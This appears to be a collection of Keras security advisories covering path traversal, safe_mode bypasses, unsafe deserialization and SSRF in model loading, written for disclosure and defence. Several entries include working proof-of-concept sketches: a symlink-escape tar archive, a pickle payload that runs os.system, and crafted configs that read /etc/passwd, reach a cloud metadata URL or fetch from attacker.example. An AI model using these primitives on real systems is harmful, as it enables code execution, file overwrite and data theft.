The keras.utils.get_file API in Keras, when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" safeguard. A remote attacker can craft a malicious tar archive containing special symlinks which, when extracted, allow the attacker to write arbitrary files to locations on the filesystem outside of the intended destination folder. This vulnerability is linked to the …
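To make the mechanism concrete, here is a minimal sketch of the underlying tarfile primitive (standalone Python, not Keras code; the archive contents and paths are illustrative assumptions). A symlink member escapes the destination directory, a second member is written through it, and the filter="data" option rejects the archive instead of following the link.

```python
import io
import tarfile

# Build an archive like the one an attacker could supply: the first member is
# a symlink pointing outside the destination, the second writes through it.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    link = tarfile.TarInfo("escape")
    link.type = tarfile.SYMTYPE
    link.linkname = "/tmp"  # absolute target outside the extraction folder
    tar.addfile(link)
    data = b"attacker-controlled contents"
    payload = tarfile.TarInfo("escape/pwned.txt")
    payload.size = len(data)
    tar.addfile(payload, io.BytesIO(data))

buf.seek(0)
with tarfile.open(fileobj=buf) as tar:
    # Vulnerable pattern: follows the symlink and writes /tmp/pwned.txt.
    # tar.extractall(path="dest")

    # Hardened pattern (Python 3.12+, backported to security releases of
    # 3.8-3.11): the "data" filter refuses absolute or escaping link targets.
    tar.extractall(path="dest", filter="data")  # raises AbsoluteLinkError
```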
The Keras Model.load_model method, including when executed with the intended security mitigation safe_mode=True, is vulnerable to arbitrary local file loading and Server-Side Request Forgery (SSRF). This vulnerability stems from the way the StringLookup layer is handled during model loading from a specially crafted .keras archive. The constructor for the StringLookup layer accepts a vocabulary argument that can specify a local or remote file path. Arbitrary Local File Read: …
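A hedged sketch of what such a crafted layer entry could look like, assuming the Keras 3 JSON serialization layout ("module"/"class_name"/"config"); the path and URL are illustrative placeholders, not a working exploit:

```python
# One entry inside the archive's config.json, expressed as a Python dict.
crafted_stringlookup = {
    "module": "keras.layers",
    "class_name": "StringLookup",
    "config": {
        "name": "lookup",
        # Local file read primitive: the file's lines become the layer's
        # vocabulary, recoverable after loading via get_vocabulary().
        "vocabulary": "/etc/passwd",
        # SSRF variant: a remote path fetched during model loading, e.g.
        # "vocabulary": "http://169.254.169.254/latest/meta-data/",
    },
}
```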
Deserialization of untrusted data can occur in Keras versions 3.11.0 up to but not including 3.11.3, enabling a maliciously uploaded Keras file containing a TorchModuleWrapper class to run arbitrary code on an end user's system when loaded, despite safe mode being enabled. The vulnerability can be triggered through both local and remote files.
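The dangerous primitive here is pickle-based restoration: torch's serialization ultimately unpickles, and unpickling executes __reduce__ payloads. A minimal standalone sketch of that primitive follows (not the actual exploit; it assumes the wrapper restores its module with a torch.load call that does not enforce weights_only):

```python
import io
import torch

class Payload:
    """Stand-in for the serialized state an attacker embeds in the model."""
    def __reduce__(self):
        import os
        # Runs at unpickling time, i.e. while the model is being loaded.
        return (os.system, ("echo code-execution-at-load-time",))

buf = io.BytesIO()
torch.save(Payload(), buf)           # attacker-side: embed the payload bytes
buf.seek(0)
torch.load(buf, weights_only=False)  # victim-side load executes the payload
```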
When a model in the .h5 (or .hdf5) format is loaded using the Keras Model.load_model method, the safe_mode=True setting is silently ignored, with no warning or error raised. This allows an attacker to execute arbitrary code on the victim's machine with the same privileges as the Keras application. This report is specific to the .h5/.hdf5 file format. The attack works regardless of the other parameters passed to load_model and does not …
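A short sketch of the hazard from the victim's perspective (the filename is illustrative, and "model.h5" is assumed to embed a Lambda layer whose function was serialized as marshalled Python bytecode, as the legacy HDF5 format does):

```python
import keras

# The legacy .h5 code path never consults safe_mode, so the flag below is
# silently discarded and the embedded Lambda bytecode is unmarshalled and
# executed while the model is being reconstructed.
model = keras.models.load_model("model.h5", safe_mode=True)
```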
Arbitrary Code Execution in Keras: Keras versions prior to 3.11.0 allow arbitrary code execution when loading a crafted .keras model archive, even when safe_mode=True. The issue arises because the archive's config.json is parsed before layer deserialization, and that parsing step can invoke keras.config.enable_unsafe_deserialization(), effectively disabling safe mode from within the loading process itself. An attacker can place this call first in the archive and then include a Lambda layer whose function is …
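A hedged sketch of the archive layout this describes, assuming the Keras 3 serialization format; the Lambda payload itself is elided. The crucial point is ordering: the first object in config.json is resolved and called before the safe-mode check would apply to the later layer.

```python
# Shape of the relevant config.json content, expressed as Python data.
crafted_config = [
    {
        # Resolved and invoked first: flips the global flag from inside
        # the loading process itself.
        "module": "keras.config",
        "class_name": "enable_unsafe_deserialization",
        "registered_name": "enable_unsafe_deserialization",
    },
    {
        # Deserialized second: safe mode is now off, so a Lambda layer with
        # a serialized function can execute attacker code.
        "module": "keras.layers",
        "class_name": "Lambda",
        "config": {"function": "..."},  # attacker payload, elided
    },
]
```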
Duplicate Advisory: This advisory has been withdrawn because it is a duplicate of GHSA-36rr-ww3j-vrjv. This link is maintained to preserve external references. Original Description: The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True. An attacker can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, triggers arbitrary code execution. This is achieved by crafting a special .h5 archive file …
It is possible to bypass the mitigation introduced in response to CVE-2025-1550 when an untrusted Keras v3 model is loaded, even when safe_mode is enabled, by crafting malicious arguments to built-in Keras modules. The vulnerability is exploitable in the default configuration and does not depend on user input; it only requires an untrusted model to be loaded.
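A deliberately hypothetical sketch of this class of bypass (the class name and argument below are placeholders, not the module actually exploited): safe mode restricts which types may be deserialized, but every allow-listed object is still instantiated with attacker-chosen constructor arguments.

```python
# One object inside a crafted model config, expressed as a Python dict.
crafted_entry = {
    "module": "keras.layers",          # an allow-listed, built-in module
    "class_name": "SomeBuiltinLayer",  # hypothetical built-in class
    "config": {
        # If any built-in constructor performs a file read, network fetch,
        # or dynamic import based on its arguments, that side effect fires
        # during load_model despite safe_mode=True.
        "some_path_argument": "http://attacker.example/payload",
    },
}
```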
Duplicate Advisory: This advisory has been withdrawn because it is a duplicate of GHSA-c9rc-mg46-23w3. This link is maintained to preserve external references. Original Description: A safe mode bypass vulnerability in the Model.load_model method in Keras versions 3.0.0 through 3.10.0 allows an attacker to achieve arbitrary code execution by convincing a user to load a specially crafted .keras model archive.
The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be imported and invoked during model loading.
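A hypothetical sketch of the shape of such a config.json entry (module, attribute, and arguments are illustrative placeholders, not a working proof of concept): the loader resolves "module" plus "class_name" via a dynamic import and then invokes the resolved object with the attacker-supplied arguments.

```python
# One entry inside the archive's config.json, expressed as a Python dict.
malicious_entry = {
    "module": "os",           # an arbitrary importable module, not just keras.*
    "class_name": "system",   # an arbitrary attribute of it, here a callable
    "config": "...",          # attacker-chosen arguments, elided here
    "registered_name": "system",
}
```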
Duplicate Advisory: This advisory has been withdrawn because it is a duplicate of GHSA-48g7-3x6r-xfhp. This link is maintained to preserve external references. Original Description: The Keras Model.load_model function permits arbitrary code execution, even with safe_mode=True, through a manually constructed, malicious .keras archive. By altering the config.json file within the archive, an attacker can specify arbitrary Python modules and functions, along with their arguments, to be loaded and executed during model …
An issue in Keras 3.7.0 allows attackers to write arbitrary files to the user's machine when a crafted tar file is downloaded and extracted through the get_file function.